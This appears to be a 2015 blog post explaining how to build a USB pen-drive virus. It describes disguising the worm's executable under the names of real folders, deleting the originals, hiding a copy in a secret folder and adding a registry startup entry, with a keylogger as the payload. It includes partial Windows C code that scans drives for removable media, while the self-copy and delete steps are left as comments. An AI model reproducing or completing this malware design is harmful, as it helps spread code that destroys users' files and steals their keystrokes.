How a pen drive virus works?

Have you ever been affected by pen drive virus ?

Did you ever notice that all your folders are replaced with "folder imaged" exe?.

How it works?

It is build on top of Two components

1. Payload section -> can be a key logger , data mining stuffs ,pots

2. Pen drive distribution

Here is the flow chart

Virus running(on startup)
|
check whether a pen drive connected or not
|
check it is infected or not( why wasting cpu?)
|
Ensure that our virus is named after all the folders
if there is a folder named "photos" create our virus in the
name of "photos.exe"
|
now pen drive removed & user is connecting it to other PC ...
looking for photos folder fk .. no files
|
Our Virus is running on the background ->
Install the virus (just copy the exe to a secret folder ),
make the registry entry to start virus whenevery pc boots ..
|
done

Only Distribution - for Keylogger pls refer the previous post

CALLBACK TimerProc(HWND hwnd, UINT uMsg, unsigned int idEvent, DWORD dwTime)

{

int a =GetLogicalDrives();

for (int i=0;i<12;i++) // 12 drives ,more than enough man

{

bit= (a>>i)&0x1;

if (bit)

{

switch(i)

{

case 0:

continue;

break;

case 1:

strcpy(Str,"B:\\");

break;

case 2:

strcpy(Str,"C:\\");

break;

case 3:

strcpy(Str,"D:\\");

break;

case 4:

strcpy(Str,"E:\\");

break;

case 5:

strcpy(Str,"F:\\");

break;

case 6:

strcpy(Str,"G:\\");

break;

case 7:

strcpy(Str,"H:\\");

break;

case 8:

strcpy(Str,"I:\\");

break;

case 9:

// Str="J:\\";

strcpy(Str,"J:\\");

break;

case 10:

// Str="K:\\";

strcpy(Str,"K:\\");

break;

case 11:

strcpy(Str,"L:\\");

break;

}

if (GetDriveType(Str)== DRIVE_REMOVABLE) // Me pendrive <- feed me

{

// make a self copy

// delete the folders

}

ihaack - Embedded

Saturday, 7 November 2015